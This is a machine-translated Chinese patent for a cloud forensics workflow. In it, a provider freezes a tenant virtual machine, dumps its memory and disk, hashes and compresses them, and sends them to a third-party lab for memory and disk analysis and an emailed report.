A kind of server evidence collecting method examined oneself based on virtual machine
Technical field
The present invention relates to information technology fields, particularly, are related to a kind of server evidence collecting method examined oneself based on virtual machine.
Background technology
With the rapid development of cloud computing technology, information industry has come into " cloud era ".In face of invading and attacking such as
This ordinary network environment, when cloud service user is attacked or cloud service user realizes the system exception of oneself, cloud
Service provider, which can carry out its system situation analysis evidence obtaining, becomes cloud computing security fields urgent problem to be solved.Due to cloud
The equipment of the characteristics of calculating itself, bottom is transparent for users, therefore the safety of cloud computing platform is cloud service
The most concerned problem of user.Requirement of the cloud service user to safety is high, and cloud service provider is in addition to disposing corresponding safety
Equipment is resisted except various attacks, should also provide detailed evidence obtaining point after the system of its user is invaded and destroyed
Analyse result.
In cloud computing platform, the virtualization technology to hardware resource is the basis place of entire platform.Due to cloud computing
The privacy of user and isolation are required in platform relatively high.Therefore, some special want during forensics analysis
It asks, is mainly manifested in the following aspects:
1. diversity:In this day and age, cloud computing technology is applied more and more widely in crucial industry and field, different
The selected cloud service provider of industry and field it is different, and bottom hardware money that different cloud service providers possesses at it
Used virtualization technology may also be different on source.And user is in use, can be configured and be corresponded to according to the demand of oneself
Virtual machine.Under numerous possible matchings, the type of virtual machine collected evidence is needed to have very more possibilities.
2. accuracy:Since it is necessary to have very high privacies when cloud computing platform is to cloud service user offer service
Property require, in cloud service user when using the resource of cloud computing platform, cloud computing provider is not eligible for checking user's void
Specifying information in quasi- machine.Therefore, when collecting evidence to visually-impaired user virtual machine, cloud computing provider is typically only capable to get all
Such as abstract data of core dump file.The abstractness of data, which increases, understands its difficulty, and forensics analysis is needed abstract
Bridge is erected between data and useful information.
3. agility:Since cloud service provider can be on its cloud computing platform to large number of cloud computing user
Calculating or storage service are provided, and each cloud computing user can buy several virtual machine instances simultaneously according to self-demand.
In this case, a user is just possible to generate a large amount of forensics analysis demand, and the crowd on different cloud computing platforms
The scale of forensics analysis demand caused by multi-user can then become very huge.Therefore, evidence-taking and analysis system must have fast
Speed carries out the ability of virtual machine forensics analysis so that evidence-taking and analysis system can play its important function in a practical situation.
In order to solve the business demand of virtual machine testing in practical virtualized environment, global scientific research, engineering staff's warp
New Year research and exploration, have developed many virtual machine detection methods.These methods can be attributed to two major classes:Explicit
Information Introspection and Implicit Information Introspection.
①Explicit Information Introspection:Such methods mainly utilize known operating system
Internal data structure and deposit position obtains the inner case of target virtual machine;Debug symbolic information, such as Linux operations
.map files in system, can also provide the internal information of target virtual machine.However close source operating system or same operation system
Difference between the different editions of system can improve the difficulty that virtual machine internal data are obtained with method of the same race so that maintenance program
Work it is very arduous.Although there is such difficulty, its accuracy and agility are still so that this method is being used.
Livewire is the intruding detection system based on virtual machine, increases additional library in virtual machine internal, utilizes kernel tailoring information
To lock the data structure of simultaneously read operation system;VMwatcher is again based on the intruding detection system of virtual machine, but it
Start other virtual machine on the basis of virtual machine monitor to perform intrusion detection, invasion is reduced using the isolation of virtual machine
The risk that detecting system is tampered;Lares disposes specific library in virtual machine monitor, and hook is implanted into target virtual machine
Son, when hook is by specific operation triggering, the related API in the library of virtual machine monitor deployment obtains the letter of virtual machine internal
Breath.Although the method that this virtual machine is examined oneself can obtain the information of virtual machine internal, fatal weakness is remained:
On the one hand, the operating system or widely known operating system internal data structure increased income can cause Malware further pseudo-
Factum is filled, the target virtual machine internal information obtained from is inaccurate or not perfect so that forensics analysis can not be successfully
It carries out;On the other hand, the demand of the isolation and user of virtual machine to privacy can be destroyed by hook being disposed in target virtual machine, no
The different editions of biconditional operation system formulate the difficulty that different programs increases forensics analysis.
②Implicit Information Introspection:Such methods are obtained from known system structure
Information is especially interacted with specific structure in system, such as registration table, I/O subsystems or memory management unit etc..These
Information not fully depends on operating system so even by the system of being invaded, and is not easy to be tampered to these information.Due to this
The natural limitation of kind method, all information for obtaining operating system are that comparison is difficult, and also has time delay sometimes, or even generates
The information of mistake.It is a typical case that virtual address, which is converted to physical address, using the page table in memory.Antfarm is utilized
CR3 registers track the true progress information of target virtual machine, recycle and obtain user with the network linking of target virtual machine
The progress information that rank is seen, both progress informations of cross validation can detect whether have in target virtual machine be hidden into
Journey.Although the method that this virtual machine is examined oneself can remain and not allow from the external information for obtaining virtual machine internal
The defect of ignorance:It is not a nothing the matter that useful operating system internal information is extracted from a large amount of bottom data.
Since virtualized environment has isolation, the characteristic of privacy, the more of service are enough kept for forensics analysis
Sample, accuracy and agility, this just proposes virtual machine forensics analysis process new higher requirement.Meanwhile from above-mentioned
It is not difficult to find out in two kinds of main methods, due to their intrinsic defects, they is applied in forensics analysis field still
It is difficult and insufficient that there is some.Therefore, many technical staff in this field are making great efforts to study new virtual machine forensics analysis side
Method, to solve the problems, such as the virtual machine forensics analysis in cloud computing service.How ensure forensics analysis accuracy premise
Under, it is emphasis of people's attention to improve the efficiency of forensics analysis as much as possible, increase the versatility of forensics analysis.
Invention content
Present invention aims at a kind of server evidence collecting method examined oneself based on virtual machine is provided, to solve ensureing cloud rent
Under the premise of the privacy of family, quickly analyze virtual machine internal information and state, can when the virtual machine of tenant is encroached on,
Meet cloud computing platform to technical problems such as accuracy, the agility demands of tenant's virtual machine forensics analysis.
To achieve the above object, the present invention provides a kind of server evidence collecting methods examined oneself based on virtual machine, specific to walk
It is rapid as follows:
S1. the status information of guest virtual machine is obtained, and status information compressed file is stored in database and is sent to third
Fang Jinhang forensics analysis;
S2. forensics analysis is carried out to the target virtual machine status information file of cloud computing provider transmission;
S3. testing result is provided into standardization examining report and fed back.
As one of preferred technical solution, step S1 utilizes the franchise attribute and build-in function of virtual machine monitor, right
The memory of target virtual machine carries out core dump and generates core dump file, and obtains be used as target virtual machine in server simultaneously
The file of disk;Core dump herein refers to that virtual machine monitor (wraps the total data in the memory of specified virtual machine
Include system data and user data) it preserves into dump file, supply related personnel analyzes;Core dump may be implemented pair
The bit-level backup functionality of internal storage data, the i.e. memory of user can be completely saved, and any information in memory can be complete
Backup can reflect all status informations at the last moment before target virtual machine is frozen;Specific method is:
S1-1. the operating status for freezing guest virtual machine, using the function of virtual machine monitor to being deposited into virtual machine
Row dump, while the corresponding virtual disk files of virtual machine being copied;
S1-2., core dump file and virtual disk files are stored in the number of cloud service provider according to corresponding rule
According in library;
S1-3. memory dump file and virtual disk files are verified, are packaged and compress further according to corresponding format,
It is transmitted to third party testing agency, the successful reception information sent until receiving third party testing agency.
This is a kind of detection process of out-of-box, without making any modification in virtual machine internal.It can be to client
The state of the frozen moment of virtual machine carries out the backup of bit levels, and safety engineer's backward recovery is helped to go out target virtual machine
Operating status.
As further preferred one of technical solution, step S1-1 is specifically included:
S1-1-1. it when cloud service user realizes that the virtual machine of oneself has abnormal, proposes to detect to cloud service provider
The demand of virtual machine, cloud service provider are connected to the virtual machine that the user is freezed in demand immediately later;
S1-1-2. cloud service provider is literary to core dump using the memory of virtual machine monitor dump target virtual machine
Part;Further according to the configuration of target virtual machine, the virtual disk files and copy for belonging to the virtual machine are found, to capture evidence obtaining point
Analyse the required original evidence material of target virtual machine.The operation of virtual machine is followed by freezed in this capture operation, therefore can
Accurately reflect the time of day of target virtual machine.
As further preferred one of technical solution, the specific method of step S1-2 is:Cloud service provider establishes one
A Document image analysis, will propose the ID of the cloud service user of detection demand, the ID of target virtual machine and freeze virtual machine
At the time of and target virtual machine status information compressed file this deposit database in.
As further preferred one of technical solution, cloud service provider is built with third party's detection machine in step S1-3
Vertical secure link transmits compressed file;While step S1-2 is carried out, cloud service provider is sent out to third party testing agency
The request of secure link is established, third party listens to after request, returns to a feedback that can establish secure link, cloud service
Provider receives feedback later and the third-party institution establishes secure link, the target virtual machine state being used in transmitting step S1-2
Information Compression file.After file transmission success, third party verifies the MD5 values of the compressed file received and in compressed file name ratio
It is right, it is further decompressed if comparing successfully and verifies two files in file, otherwise do not decompressed and carried to cloud service
The requirement transmitted again is returned for quotient;Previous step success after, decompressing compressed file and with the information in JSON files again into
Row compares, and to the file that receives of cloud service provider feedback is completely correct if still comparing successfully, otherwise continue to
Cloud service provider returns to the requirement transmitted again until file is successfully delivered.
As further preferred one of technical solution, step S1-3 is by the state of the step S1-1 target virtual machines generated
Information Compression file deposit database simultaneously be sent to third party carry out forensics analysis, due to target virtual machine core dump file and
Virtual disk files are all relatively very big, it is therefore necessary to be compressed to it, save the efficiency that memory space improves transmission simultaneously;
After compression, it using the ID of cloud service user, the ID and timestamp of virtual machine, generates unique label and (utilizes
The cryptographic Hash that hash algorithm calculates file is marked, and facilitates subsequent completeness check) it is used for being associated with compressed file;Compression
It, will be in these files and information storage to target virtual machine information aggregate after the completion of label;Target virtual machine information aggregate is
The database that above-mentioned compressed file and label are stored;It is stored in after database and establishes safety biography with third party testing agency
Compressed file is sent to third party and carries out forensics analysis by defeated link.
As one of technical solution still more preferably, the specific method of compression and label is:
(1) file is created, core dump file and virtual disk files are put into new folder;
(2) a JSON file is established, relevant information is recorded:Core dump file and virtual disk are calculated separately first
Then the MD5 cryptographic Hash of file this cryptographic Hash is written in JSON files;Further user receives inspection in JSON files simultaneously
Survey the mail address of result report;The form of this JSON file is at this time
This JSON file is finally put into the file created in (1);
(3) compressed document file compresses file 7z compress techniques, and compression calculates the compressed file generated after terminating
MD5 cryptographic Hash, and using this calculated cryptographic Hash as the filename of compressed file.
As further preferred one of technical solution, step S1-3 is specifically included:
S1-3-1. the core dump file and virtual disk files for obtaining target virtual machine, are put into and are established according to User ID
File in;
S1-3-2. the MD5 cryptographic Hash of core dump file and virtual disk files is calculated separately, obtains user to receive
As a result mail address;
S1-3-3. the cryptographic Hash calculated in JSON file storage steps S1-3-2 and the file for depositing in foundation are established
In;
S1-3-4. it compresses the file of acquisition and calculates the MD5 cryptographic Hash of compressed file;
S1-3-5. the MD5 cryptographic Hash renaming compressed files of compressed file are used;
S1-3-6. compressed file is backed up, and builds target virtual machine status information file database, is terminated.
As one of technical solution still more preferably, the specific method of step S1-3-5 is:Renaming compressed file
For " User ID "+"-"+" the MD5 cryptographic Hash that step S1-3-4 is calculated ".
As one of technical solution still more preferably, the specific method of step 1-3-6 is:Third party's forensics analysis machine
Structure founds Document image analysis, the status information compressed file about target virtual machine of cloud service provider transmission is carried out standby
Part, including the information of cloud service provider, the cryptographic Hash for transmitting arrival time and compressed file.
As one of preferred technical solution, the compressed file that transmission comes is unziped it recovery by step S2, i.e., by mesh
The associated documents of mark virtual machine restore into its corresponding file, to reach the result of target virtual machine state recovery;Text
Part restores after completing, and carries out memory forensics analysis and disk forensics analysis respectively;The method of forensics analysis is according to target void
The data structure template of the corresponding memory of operating system of quasi- machine, operating status of the analysis target virtual machine before frozen, into
And reconfigured according to the data in disk, then by behavior of the target virtual machine before frozen, to analyze destination virtual
The anomalies of machine;It is as follows:
S2-1. memory forensics analysis is carried out, all status informations when virtual machine operation, such as all processes are obtained,
The kernel module etc. of all loads;
S2-2. disk forensics analysis is carried out, all external datas when virtual machine operation, such as daily record, registration table are obtained
Etc.;
S2-3. two kinds of data are combined and is analyzed, detect the safe condition of target virtual machine, analyze destination virtual
The machine problem.
As further preferred one of technical solution, step S2-1's specifically includes:
S2-1-1. the core dump file of target virtual machine is verified, the MD5 cryptographic Hash of file is obtained, with target
The MD5 cryptographic Hash in JSON files in virtual machine state information compressed file compares;If the two is consistent, enter step
S2-1-2;If the two is inconsistent, new forensics analysis copy is copied from the database in mechanism again, until the two MD5
Value is consistent;
S2-1-2. judge the OS Type corresponding to the core dump file and be written in variable OStype, utilize
OStype takes out the internal storage structure template corresponding to the operating system in database within the organization and turns suitable for the memory
Store up the memory forensics analysis tool of the file format of file;
S2-1-3. it according to internal storage structure template and using memory forensics analysis tool, is parsed in memory dump file
Information wherein included:Include mainly progress information, kernel information and network information etc.;To progress information, need to turn from memory
Active process list is extracted in storage file, the hiding or process that is terminated, and according to the pass of parent process and subprocess
The dynamic link library etc. that series goes out process tree and process is related to;To kernel information, need to extract from core dump file
The kernel module loaded and the kernel module unloaded recently detect the kernel module being hidden, kernel readjustment etc.;Network is believed
Breath, needs to extract network essential information such as interface, socket, active connection and port numbers etc. from core dump file.
As further preferred one of technical solution, the specific method of step S2-2 is:To the virtual of target virtual machine
Disk file is verified, and the MD5 cryptographic Hash of file is obtained, with the JSON files in target virtual machine status information compressed file
In MD5 values compare;If the two is consistent, the analysis of next step is carried out;If the two is inconsistent, again from the number in mechanism
According to new forensics analysis copy is copied in library, until the two MD5 values are consistent;Judge the hard disk lattice corresponding to the virtual disk files
Formula is simultaneously written in variable IMGtype, is taken out suitable for corresponding to the hard disk form in database within the organization using IMGtype
Disk forensics analysis tool;According to the file format of disk and disk forensics analysis tool is utilized, in virtual disk files
Parse information wherein included:Include mainly user list, file directory and log information etc.;The information parsed is exported
And it is stored in the file of formatting;To file system, killing is carried out to disk using viral trojan horse detection tool, detects target
Whether virtual machine virus infection or is implanted wooden horse;The networking behavior for analyzing target virtual machine simultaneously, has detected whether exception
Behavior.To log information, rogue program can be rebuild according to timeline and led after detecting virus/wooden horse/exception networking behavior
The event etc. of cause.
Step S2-2 is specifically included:
S2-2-1. transmission objectives virtual machine state information file;
S2-2-2. judge whether the MD5 cryptographic Hash of compressed file is consistent with filename, is to enter step S2-2-3, it is no
Then it is directly entered step S2-2-5;
S2-2-3. it decompresses, judges whether core dump file MD5 cryptographic Hash and information in JSON files are consistent, are then
S2-2-4 is entered step, step S2-2-5 is otherwise directly entered;
S2-2-4. judge whether virtual disk files MD5 cryptographic Hash and information in JSON files are consistent, are to enter step
Otherwise S2-2-5 is directly entered step S2-2-5;
S2-2-5. judge whether to need to transmit again, be then return to step S2-2-2, otherwise terminate.
As one of technical solution still more preferably, by secure link to third party's detection machine in step S2-2-1
The status information compressed file of structure transmission objectives virtual machine.
As one of technical solution still more preferably, third party testing agency receives compression text in step S2-2-2
After part, compressed file is verified using filename.
As one of technical solution still more preferably, step S2-2-3 to two files in the file after decompression,
The information provided using the JSON files in file is verified respectively.
As one of preferred technical solution, step S3 is after the exception of target virtual machine is detected, by interior access
Corresponding JSON files are all listed according to the format of standard and generated to the result of the result and disk forensics analysis of demonstrate,proving analysis, will
Examining report returns to cloud service provider and transmits subscriber mailbox address attached in file;Specific method is:In conjunction with
Memory forensics analysis and disk forensics analysis as a result, comprehensive analysis goes out the target virtual machine problem, be e.g. implanted
It wooden horse or has been tampered registration table etc., and above-mentioned evidence obtaining result and the problem of analyzing according to fixed format is generated and taken
Demonstrate,prove analysis result information;To detecting that abnormal target virtual machine carries out feature extraction, obtain special caused by particular malware
Sign, by the property data base in this feature written agency;The result report of generation is stored in the database of in-house deployment
It is backed up;Mail of the user for reception result is again found from the target virtual machine status information file transmitted
The result report of forensics analysis is sent to this mail address by location;Then it is returned to target virtual machine to cloud service provider
The feedback information of success forensics analysis;Finally delete the result report of forensics analysis.
As further preferred one of technical solution, step S3 is specifically included:
S3-1. it by after the target virtual machine status information compressed file of forensics analysis backs up deposit database, deletes;
S3-2. memory forensics analysis is carried out to memory dump file;
S3-3. disk forensics analysis is carried out to virtual disk files;
S3-4. comprehensive analysis is carried out to the analysis result in step S3-2 and step S3-3, generates forensics analysis result report
It accuses;
S3-5. forensics analysis result is reported and feeds back to cloud service user according to the mail address in JSON files;
S3-6. it after reporting forensics analysis result to backup deposit database, deletes.
As one of technical solution still more preferably, using step S3-1 and step S3-4 structure initial data and take
Demonstrate,prove Analytical Results Database.
The invention has the advantages that:
Virtual machine is quick in server under the virtualized environment background of cloud computing platform for present invention auxiliary, reliably takes
Card notifies cloud service provider and proposes wanting for forensics analysis when cloud service user realizes that the virtual machine of oneself has abnormal
It asks.Freeze the virtual machine when cloud service provider is connected to request immediately and core dump is carried out together with virtual to the memory of virtual machine
The corresponding disk file of machine is packaged, and establishes one-to-one mapping relations to original evidence material and User ID at this time, then right
Original material carries out completeness check, is sent to third party testing agency later and carries out forensics analysis.Third party is connected to original evidence
After material, completeness check is carried out, material copy is preserved first if detection is errorless and carries out depositing card, further according to designed calculation
The memory forensics analysis and disk forensics analysis that method flow is standardized, the result and operation log of each step of forensics analysis
It will be recorded.After forensics analysis, as a result report sends back cloud computing provider, is given result by cloud service provider
Cloud service user selects retaining or destroying to original evidence copy further according to the wish of cloud service user.Entirely taking
During card, cloud service provider is not involved in the process of forensics analysis, is only involved in and obtains original evidence material;Third party's detection machine
Structure is only joined with cloud service provider, ensures the privacy of cloud service user.
Compared with traditional virtual machine forensics analysis method, main advantages of the present invention are as follows:
1, the present invention does not need cloud service provider and affixes one's name to forensics analysis module in its platform interior.The present invention proposes cloud service
Requirement for quotient is only to obtain the associated documents for the target virtual machine for having forensics analysis user to require, and carried out to file simple
Completeness check.The characteristics of this on-demand purchase forensics analysis service so that cloud service provider is related without additional deployment
Hardware device and technical staff can meet the forensics analysis demand of user.
2, the present invention can greatly improve the efficiency that forensics analysis is carried out to target virtual machine, because the third-party institution gathers around
The safety engineer for having the analysis tool and profession of profession, can greatly improve the accuracy to forensics analysis and speed, together
When can reduce the consumption of file transmission by being laid with proprietary link, to ensure wanting for forensics analysis accuracy and agility
It asks.
3, the advantages of having both high reusability and expansibility.Since cloud service provider is to the forensics analysis of target virtual machine
Demand it is similar, therefore in the third-party institution dispose forensics analysis tool can be to more platform services, if respectively
Platform, which is respectively disposed, then will produce a large amount of idle and waste;Simultaneously as service is one-to-many pattern, new work is deployed
Tool can allow all platforms to enjoy novel service, therefore forensics analysis tool is also easier to extended deployment.
4, complete Backup Data management.Database use is deployed in cloud service provider and third party testing agency
Backup Data concentrate tube reason to be got up, to be used them when carrying out forensics analysis detection and data are restored.
5, to there is the client of forensics analysis demand to carry out secret protection.Cloud service provider only obtains the original of user virtual machine
It beginning evidence material but does not analyze, and third party testing agency only carries out forensics analysis to the original material transmitted but and does not know
Know the customer information of target virtual machine, cloud service provider and testing agency and is associated with the two using unique key assignments.
6, the result report of unified format.The result report of unified format is provided the user of different cloud service providers,
Contribute to same user different platform obtain evidence obtaining service after checking, can further help skilled addressee into
Row automatic business processing.
Other than objects, features and advantages described above, the present invention also has other objects, features and advantages.
Below with reference to figure, the present invention is described in further detail.
Description of the drawings
The attached drawing constituted part of this application is used to provide further understanding of the present invention, schematic reality of the invention
Example and its explanation are applied for explaining the present invention, is not constituted improper limitations of the present invention.In the accompanying drawings:
Fig. 1 is the general flow chart of the present invention;
Fig. 2 is flow chart (the step S1-3-1~step S1- that the status information of target virtual machine is marked and is compressed
3-6);
Fig. 3 is flow chart (the step S2-2-1~step S2-2- of the status information compressed file transmission to target virtual machine
5);
Fig. 4 is the flow chart (step S3-1~step S3-6) to target virtual machine forensics analysis.
Specific implementation mode
The embodiment of the present invention is described in detail below in conjunction with attached drawing, but the present invention can be limited according to claim
Fixed and covering multitude of different ways is implemented.
Referring to Fig. 1~Fig. 4, a kind of server evidence collecting method examined oneself based on virtual machine is as follows:
S1. the status information of guest virtual machine is obtained, and status information compressed file is stored in database and is sent to third
Fang Jinhang forensics analysis;
S2. forensics analysis is carried out to the target virtual machine status information file of cloud computing provider transmission;
S3. testing result is provided into standardization examining report and fed back.
Wherein, step S1 utilizes the franchise attribute and build-in function of virtual machine monitor, to being deposited into target virtual machine
Row core dump generates core dump file, and obtains the file for being used as target virtual machine disk in server simultaneously;Herein
Core dump refers to virtual machine monitor by total data (including system data and the user in the memory of specified virtual machine
Data) it preserves into dump file, supply related personnel analyzes;The bit-level to internal storage data may be implemented in core dump
Backup functionality, the i.e. memory of user can be completely saved, any information in memory can full backup, can reflect mesh
Mark the frozen preceding all status informations at the last moment of virtual machine;Specific method is:
S1-1. the operating status for freezing guest virtual machine, using the function of virtual machine monitor to being deposited into virtual machine
Row dump, while the corresponding virtual disk files of virtual machine being copied;
S1-2., core dump file and virtual disk files are stored in the number of cloud service provider according to corresponding rule
According in library;
S1-3. memory dump file and virtual disk files are verified, are packaged and compress further according to corresponding format,
It is transmitted to third party testing agency, the successful reception information sent until receiving third party testing agency.
This is a kind of detection process of out-of-box, without making any modification in virtual machine internal.It can be to client
The state of the frozen moment of virtual machine carries out the backup of bit levels, and safety engineer's backward recovery is helped to go out target virtual machine
Operating status.
Step S1-1 is specifically included:
S1-1-1. it when cloud service user realizes that the virtual machine of oneself has abnormal, proposes to detect to cloud service provider
The demand of virtual machine, cloud service provider are connected to the virtual machine that the user is freezed in demand immediately later;
S1-1-2. cloud service provider is literary to core dump using the memory of virtual machine monitor dump target virtual machine
Part;Further according to the configuration of target virtual machine, the virtual disk files and copy for belonging to the virtual machine are found, to capture evidence obtaining point
Analyse the required original evidence material of target virtual machine.The operation of virtual machine is followed by freezed in this capture operation, therefore can
Accurately reflect the time of day of target virtual machine.
The specific method of step S1-2 is:Cloud service provider establishes a Document image analysis, will propose detection demand
Cloud service user ID, the ID of target virtual machine and at the time of freeze virtual machine and the compression of target virtual machine status information
In this deposit database of file.
Cloud service provider establishes secure link transmission compressed file with third party testing agency in step S1-3;In step
While S1-2 is carried out, cloud service provider sends out the request for establishing secure link to third party testing agency, and third party monitors
To after request, a feedback that can establish secure link is returned to, cloud service provider, which receives, feeds back later and third party's machine
Structure founds secure link, the target virtual machine status information compressed file being used in transmitting step S1-2.After file transmission success,
The MD5 values for the compressed file that third party's verification receives simultaneously are compared in compressed file name, are further decompressed simultaneously if comparing successfully
Two files in file are verified, otherwise not decompression and the requirement transmitted again to cloud service provider return;Upper one
After walking successfully, decompressing compressed file is simultaneously compared with the information in JSON files again, to cloud if still comparing successfully
The file that service provider's feedback receives is complete correct, otherwise continues to return to the requirement transmitted again to cloud service provider
Until file is successfully delivered.
The status information compressed file of the step S1-1 target virtual machines generated is stored in database and is sent to by step S1-3
Third party carries out forensics analysis, since the core dump file and virtual disk files of target virtual machine are all relatively very big,
It is necessary to be compressed to it, the efficiency that memory space improves transmission simultaneously is saved;After compression, made using cloud service
The ID of user, the ID and timestamp of virtual machine, generate unique label (using hash algorithm calculate the cryptographic Hash of file into
Line flag facilitates subsequent completeness check) it is used for being associated with compressed file;After the completion of compression and label, by these files and letter
In breath storage to target virtual machine information aggregate;Target virtual machine information aggregate is to store above-mentioned compressed file and label
The database come;Safe transmission is established with third party testing agency to link, compressed file is sent to third after deposit database
Fang Jinhang forensics analysis.
Compression and the specific method marked are:
(1) file is created, core dump file and virtual disk files are put into new folder;
(2) a JSON file is established, relevant information is recorded:Core dump file and virtual disk are calculated separately first
Then the MD5 cryptographic Hash of file this cryptographic Hash is written in JSON files;Further user receives inspection in JSON files simultaneously
Survey the mail address of result report;The form of this JSON file is at this time
This JSON file is finally put into the file created in (1);
(3) compressed document file compresses file 7z compress techniques, and compression calculates the compressed file generated after terminating
MD5 cryptographic Hash, and using this calculated cryptographic Hash as the filename of compressed file.
Step S1-3 is specifically included:
S1-3-1. the core dump file and virtual disk files for obtaining target virtual machine, are put into and are established according to User ID
File in;
S1-3-2. the MD5 cryptographic Hash of core dump file and virtual disk files is calculated separately, obtains user to receive
As a result mail address;
S1-3-3. the cryptographic Hash calculated in JSON file storage steps S1-3-2 and the file for depositing in foundation are established
In;
S1-3-4. it compresses the file of acquisition and calculates the MD5 cryptographic Hash of compressed file;
S1-3-5. the MD5 cryptographic Hash renaming compressed files of compressed file are used;
S1-3-6. compressed file is backed up, and builds target virtual machine status information file database, is terminated.
The specific method of step S1-3-5 is:Renaming compressed file is " User ID "+"-"+" step S1-3-4 calculating
MD5 cryptographic Hash ".
The specific method of step 1-3-6 is:Third party's forensics analysis mechanism establishes Document image analysis, and cloud service is provided
The status information compressed file about target virtual machine of quotient's transmission backs up, including the information of cloud service provider, transmission
The cryptographic Hash of arrival time and compressed file.
Step S2 by transmission come compressed file unzip it recovery, i.e., by the associated documents of target virtual machine restore to
In its corresponding file, to reach the result of target virtual machine state recovery;After file access pattern is completed, respectively in progress
Deposit forensics analysis and disk forensics analysis;The method of forensics analysis is the corresponding memory of operating system according to target virtual machine
Data structure template, operating status of the analysis target virtual machine before frozen, and then according to the data in disk, then by target
Behavior before virtual machine is frozen reconfigures, to analyze the anomalies of target virtual machine;It is as follows:
S2-1. memory forensics analysis is carried out, all status informations when virtual machine operation, such as all processes are obtained,
The kernel module etc. of all loads;
S2-2. disk forensics analysis is carried out, all external datas when virtual machine operation, such as daily record, registration table are obtained
Etc.;
S2-3. two kinds of data are combined and is analyzed, detect the safe condition of target virtual machine, analyze destination virtual
The machine problem.
Step S2-1's specifically includes:
S2-1-1. the core dump file of target virtual machine is verified, the MD5 cryptographic Hash of file is obtained, with target
The MD5 cryptographic Hash in JSON files in virtual machine state information compressed file compares;If the two is consistent, enter step
S2-1-2;If the two is inconsistent, new forensics analysis copy is copied from the database in mechanism again, until the two MD5
Value is consistent;
S2-1-2. judge the OS Type corresponding to the core dump file and be written in variable OStype, utilize
OStype takes out the internal storage structure template corresponding to the operating system in database within the organization and turns suitable for the memory
Store up the memory forensics analysis tool of the file format of file;
S2-1-3. it according to internal storage structure template and using memory forensics analysis tool, is parsed in memory dump file
Information wherein included:Include mainly progress information, kernel information and network information etc.;To progress information, need to turn from memory
Active process list is extracted in storage file, the hiding or process that is terminated, and according to the pass of parent process and subprocess
The dynamic link library etc. that series goes out process tree and process is related to;To kernel information, need to extract from core dump file
The kernel module loaded and the kernel module unloaded recently detect the kernel module being hidden, kernel readjustment etc.;Network is believed
Breath, needs to extract network essential information such as interface, socket, active connection and port numbers etc. from core dump file.
The specific method of step S2-2 is:The virtual disk files of target virtual machine are verified, the MD5 of file is obtained
Cryptographic Hash, compared with the MD5 values in the JSON files in target virtual machine status information compressed file;If the two is consistent,
Carry out the analysis of next step;If the two is inconsistent, new forensics analysis copy is copied from the database in mechanism again, directly
It is consistent to the two MD5 values;Judge the hard disk form corresponding to the virtual disk files and be written in variable IMGtype, utilizes
IMGtype is taken out in database within the organization suitable for the disk forensics analysis tool corresponding to the hard disk form;According to magnetic
The file format of disk simultaneously utilizes disk forensics analysis tool, and information wherein included is parsed in virtual disk files:Mainly
Including user list, file directory and log information etc.;The information parsed is exported and is stored in the file of formatting;It is right
File system, using viral trojan horse detection tool to disk carry out killing, detection target virtual machine whether virus infection or by
It is implanted into wooden horse;The networking behavior for analyzing target virtual machine simultaneously, has detected whether abnormal behaviour.To log information, can examine
After measuring virus/wooden horse/exception networking behavior, event etc. caused by rogue program is rebuild according to timeline.
Step S2-2 is specifically included:
S2-2-1. transmission objectives virtual machine state information file;
S2-2-2. judge whether the MD5 cryptographic Hash of compressed file is consistent with filename, is to enter step S2-2-3, it is no
Then it is directly entered step S2-2-5;
S2-2-3. it decompresses, judges whether core dump file MD5 cryptographic Hash and information in JSON files are consistent, are then
S2-2-4 is entered step, step S2-2-5 is otherwise directly entered;
S2-2-4. judge whether virtual disk files MD5 cryptographic Hash and information in JSON files are consistent, are to enter step
Otherwise S2-2-5 is directly entered step S2-2-5;
S2-2-5. judge whether to need to transmit again, be then return to step S2-2-2, otherwise terminate.
It is compressed to the status information of third party testing agency transmission objectives virtual machine by secure link in step S2-2-1
File.
After third party testing agency receives compressed file in step S2-2-2, compressed file is verified using filename.
Step S2-2-3 is to two files in the file after decompression, the letter provided using the JSON files in file
Breath is verified respectively.
Step S3 is after the exception of target virtual machine is detected, by the result of memory forensics analysis and disk evidence obtaining point
The result of analysis is all listed according to the format of standard and generates corresponding JSON files, and examining report, which is returned to cloud service, to be provided
Quotient transmits subscriber mailbox address attached in file;Specific method is:In conjunction with memory forensics analysis and disk evidence obtaining point
Analysis as a result, comprehensive analysis goes out the target virtual machine problem, be e.g. implanted wooden horse or be tampered registration table
Deng, and above-mentioned evidence obtaining result and the problem of analyzing according to fixed format are generated into the report of forensics analysis result;To detecting
Abnormal target virtual machine carries out feature extraction, obtains feature caused by particular malware, will be in this feature written agency
Property data base;The result report of generation is stored in the database of in-house deployment and is backed up;Again from transmitting
Mail address of the user for reception result is found in target virtual machine status information file, reports the result of forensics analysis to hair
It send to this mail address;Then the feedback information to target virtual machine success forensics analysis is returned to cloud service provider;Most
The result report of forensics analysis is deleted afterwards.
Step S3 is specifically included:
S3-1. it by after the target virtual machine status information compressed file of forensics analysis backs up deposit database, deletes;
S3-2. memory forensics analysis is carried out to memory dump file;
S3-3. disk forensics analysis is carried out to virtual disk files;
S3-4. comprehensive analysis is carried out to the analysis result in step S3-2 and step S3-3, generates forensics analysis result report
It accuses;
S3-5. forensics analysis result is reported and feeds back to cloud service user according to the mail address in JSON files;
S3-6. it after reporting forensics analysis result to backup deposit database, deletes.
Utilize step S3-1 and step S3-4 structure initial data and forensics analysis result database.
The foregoing is only a preferred embodiment of the present invention, is not intended to restrict the invention, for the skill of this field
For art personnel, the invention may be variously modified and varied.All within the spirits and principles of the present invention, any made by repair
Change, equivalent replacement, improvement etc., should all be included in the protection scope of the present invention.